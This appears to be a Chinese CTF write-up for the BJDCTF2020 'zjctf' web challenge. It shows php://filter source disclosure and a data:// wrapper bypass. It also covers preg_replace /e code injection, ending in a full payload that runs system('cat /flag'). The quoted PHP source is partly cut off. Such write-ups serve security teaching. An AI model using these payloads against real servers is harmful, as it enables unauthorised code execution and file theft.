[bjdctf2020]zjctf,不过如此

题目

[bjdctf2020]zjctf,不过如此_第1张图片

php伪协议 

file_get_contents函数读取文件内容,内容"I have a dream",可以利用data伪协议,接着通过注释使file=next.php

[bjdctf2020]zjctf,不过如此_第2张图片

 可用php伪协议读取源码file=php://filter/convert.base64-encode/resource=next.php

[bjdctf2020]zjctf,不过如此_第3张图片

 base64解码得到

 $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

代码审计

preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。

慎用preg_replace危险的/e修饰符(一句话后门常用) - 稻禾盛夏 - 博客园 (cnblogs.com)

例如:?.*=${phpinfo()},所以

 preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str)变成了

preg_replace('/(.*)/ei','strtolower("\\1")',${phpinfo()})

但会发现'.'变成了下划线,在本地试了一下,发现用'\S*'可行,至于为什么'.'变成下划线,可参考

PHP: 来自 PHP 之外的变量 - Manual

[bjdctf2020]zjctf,不过如此_第4张图片

[bjdctf2020]zjctf,不过如此_第5张图片  

至于为什么写成${phpinfo()}形式,是因为/e模式下会执行'strtolower("\\1")',而\1匹配到${phpinfo()},所以执行strtolower("${phpinfo()}"),而在php中双引号里的变量会被解析(可参考PHP: 可变变量 - Manual),单引号不会,因此phpinfo()会执行并返回true,也就是"1",最终变成了${1},echo输出空字符串

payload

?text=data://text/plain,I have a dream&file=next.php&\S*=${getflag()}&cmd=system('cat /flag');

得到flag

[bjdctf2020]zjctf,不过如此_第6张图片

 

你可能感兴趣的:(web安全,php)